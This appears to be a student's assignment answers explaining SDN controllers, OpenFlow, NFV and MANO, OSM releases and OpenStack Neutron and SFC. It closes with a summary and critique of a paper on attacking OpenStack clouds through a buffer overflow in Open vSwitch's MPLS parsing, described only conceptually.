1. Software Defined Network (SDN) a: Explain the role of SDN Controllers in the software defined network (SDN)? The SDN controller is a central component in a software defined network. It functions as the network brain and governs the network configuration and routing policy in a centralized way. Therefore, it is possible to efficiently manage the network configuration from a centralized location. For instance, forwarding tables in switches route packages according to the commands from the SDN Controller. b: What is Open flow in SDN? OpenFlow is a communication protocol and allows network controllers to determine the path of routed packets in the network. It is defined as the "interface standard technology" for SDN by the Open Networking Foundation (ONF). With OpenFlow switches from different vendors can be managed. c: Explain what “SDN decoupling hardware from software” means? The means that the SDN controller itself becomes the software. With SDN, there is no need for specialized hardware as the logic behind forwarding tables on the switches can be changed and managed via the SDN controller. Traditionally, special hardware was required to do special operations such as package filtering. With SDN, every switch can perform these operation with the appropriate code running on the SDN controller. d: Why is SDN taking long time to be adopted? Different control applications are developed by different parties using different languages that run on different controllers such as Ryu, ONOS or Floodlight. I can also imagine that mostly traditional networks are used which makes it harder to adopt to SDNs 2. Network Functions Virtualization (NFV) a: Describe the requirements for the transition from legacy networks to NFV. To transition to NFV from legacy networks, we need to establish the NFV architecture consisting of network service layer, VNF instance layer and NFV infrastructure layer. We have to obtain components (compute, storage, networking nodes) that support software, such as a hypervisor like KVM or a container management platform, needed to run VNF. We also need to implement a Management and Orchestration (MANO) that provides the framework for managing the NFV infrastructure and provisioning of new VNFs. Coexistence with legacy and interoperability among multi-vendor implementations plays an important role. Another requirement is to support transition paths from today’s physician network function (PNF) solution to a more open standard based virtual network function. Lastly, we need to establish an inter-network with legacy management functions that only have a minimal impact on existing nodes and interfaces. b: Explain what VNF is. VNF is a software that implements specific network services/functions that can be deployed and operated within an NFV infrastructure to perform certain tasks such as firewalls, DPI (Deep Packet Inspection) transcoding or virtual packet switching. A VNF consists of a single component or multiple components called VNFC (VNF Component). These VNCs are internally linked to each other in the form of a graph to represent interrelationships c: Make a description of the role of MANO (Management and Orchestration) layer in NFV structure proposed by the European Telecommunications Standards Institute (ETSI). MANO stands for Management and Orchestration and provides a framework for managing NFV infrastructure and the provisioning of new VNFs. It consist of an Orchestrator, VNF Manager (VNFM) and a Virtualized Infrastructure Manager (VIM). The orchestrator manages the lifecycle of network services. It is responsible for instantiation, policy management and performance measurement as well as KPI monitoring. The VNFM takes care of the lifecycle (initialization, updating, querying, scaling and terminating) of VNF instances. The VIM controls and manages the compute storage and network resources and also acts as a monitoring tool for the virtualization layer. d: Investigate the Open-Source MANO (OSM) from https://osm.etsi.org/ and summarize its recent release features. OSM is an open-source implementation of the reference architecture for MANO provided by ETSI. The newest release is OSM 14 as of July 2023. The main improvements are: 1. closed-loop life cycle architecture 2. security enhancements 3. Usability and platform managemen 4. Infra modelling and NF lifecycle 5. RO performance optimization 6. simulataneous IPv4 and IPv6 support 7. TAPI VIM connector 8. support of volume multi-attach 9. Helm Charts deplyoment inclucing Update/Upgrade 10.support of different output formats and replacement of Pycurl with Requests 3. OpenStack-Based Cloud Systems a: Briefly explain what OpenStack is. OpenStack is a cloud operating system. It is used to control a large pool of computing, storage, and networking resources in a datacenter. It provides administrators with a dashboard to control those resources and cloud users with a web interface for resource provisioning. It consists of multiple components called projects which can be added on demand. b: Describe “NEUTRON” as an OpenStack project that provides network resources to users? Neutron adds to OpenStack network connectivity as a service” for other other OpenStack services, such as OpenStack Compute. It implements and provides OpenStack Networking API for users to define networks and the attachments into them. It has a plug-gable architecture that supports many different popular networking vendors and technologies. c: Mention what an OpenStack project is being done for Service Function Chaining (SFC). SFC can be implemented using the Service Function Chaining API which supports SFC in Neutron. It comes as an extension and can be installed via python-networking-sfc RPM package provided by the RDO project. The core features are: 1. 2. 3. 4. 5. Creation of Service Functions Reference implementation with Open vSwitch Flow classification mechanism (ability to select and act on traffic) Vendor neutral API Modular plugin driver architecture d: Explain the benefits from building OpenStack-based cloud. The main benefits are: 1. Flexibility and customization. You can choose between different hypervisors, storage backends, and networking configurations 2. Scalability to handling increasing workloads 3. Multi-Tenancy to support create isolated environments for different demands 4. User-friendly web-based dashboard (Horizon) to reduce overhead for IT teams 4. Article summary The paper Taking Control of SDN-based Cloud Systems via the Data Plane shows security implications of virtual switches. The authors conducted system security analysis of virtual switches, introduced a new attacker model for the operation of virtualized data plane components in SDN and NFV, carried out a proof-of-concept case study attack on an OsV in OpenStack and discussed possible software mitigations and design countermeasures. The authors identified four main attack surfaces: 1. Hypervisor co-location: Components of the slow-path often run with root rights in userspace on the Host-system 2. Centralized control via direct communication: The SDN controller directly communicates using the southbound interface (e.g. via OpenFlow) to all data-plane elements using , for instance, a trusted management network. Therefore, if the controller gets compromised, data can be shared with all data-plane elements. 3. Unified packet parsing: Protocol parsing happens in the data-plane, thus it is error prone to every new supported protocol and its vulnerabilities. 4. Attacked controlled data and untrusted input: Virtual switches receive usually packages unfiltered from VMs as first contact. So in summary, virtual switches increase the attack surface e.g. for cloud environments and can also lead to compromising other parts of the cloud. They introduced a new attacker model that describes an attacker acting alone with no physical access, average computer security knowledge, but that already has a comprised VM or in the cloud by e..g by exploiting a web-application. They further assume that the cloud provider follows security best practices. The attacker is successful when they can perform arbitrary computing, create/store data or send/receive this data to all nodes and the Internet. Using this attacker model, they conducted a structured attack by using the American Fuzzy Loop (AFL) on OvS’s unified packet parser in the slow path and Return Oriented Programming to compromise the OpenStack via a worm. The problems lay in parsing the MPLS label stack. The default behavior according to standard in parsing MPLS is: pop label header and make forwarding decision, but OvS parses all labels of package beyond that. Therefore, a long label stack led to stack buffer overflow in OvS. Then they used a customized Rop-Gadget to create the appropriate ROP chain. The authors also discussed software mitigations and tested the resulting performance overhead when implementing them by measuring the latency and throughput. They observed a minimal impact of user-land protection mechanisms (1-5%) for slow path latency and no impact for the slow path latency. In regard to throughput, they observed that the user-land security features, result in an overhead only in the slow path of approximately 4-15%. The authors also discussed possible design countermeasures. One approach could be to virtualise the data-plane and disengange the hypervisor from guestVMs by giving them direct access to hardware (e.g. using a NIC). Another approach could be to use a centralized firewall that intercepts and cleans all control communication, thus removing the ability for nodes to communicate with each other. Pros: • showed how easy these attacks can be executed, therefore showing how dangerous it can be when an average skilled programmer could perform them • comparison of different virtual switch, NFV and SDN implementations, therefore giving an overview of different implementations to consider • conducted a real-life case study showcasing not only the theoretical possibilities • measured overhead for software countermeasures to show that everything comes with tradeoffs • gave an introduction to the basic concepts, which makes it easier to read and follow the paper Con: • they could have shown and explained more the implementation of the worm that compromises the cloud • the comparison table for different virtual switch, NFV and SDN implementations is hard to read. I would recommend to use clearer symbols to show the differences